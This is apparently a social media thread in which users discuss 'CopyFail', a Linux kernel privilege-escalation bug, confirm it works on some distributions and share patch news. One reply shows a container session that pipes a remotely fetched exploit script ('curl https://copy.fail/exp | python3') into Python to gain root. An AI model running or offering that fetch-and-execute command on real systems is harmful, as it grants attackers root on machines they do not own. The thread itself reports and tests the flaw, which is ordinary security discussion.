Yeah I tested CopyFail.
-
Yeah I tested CopyFail. It's real. Yikes.
https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distributions/342
-
@mttaggart Can't privesc me if I always run as root!
-
@mttaggart tested it in a docker image (used Noble as the LTS releases have patched kernels already):
```
host $ docker run --rm -it ubuntu:noble
container # apt update && apt install curl python3
container # su ubuntu
container $ curl https://copy.fail/exp | python3 && su
container #
```
I'd say this is a welp of considerable magnitude
-
@mttaggart Debian 13 still vulnerable with 6.12.74
-
Yeah I tested CopyFail. It's real. Yikes.
https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distributions/342
Editing to add:
RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.
Looks like it requires a local user account, with a password set, to exploit, yes?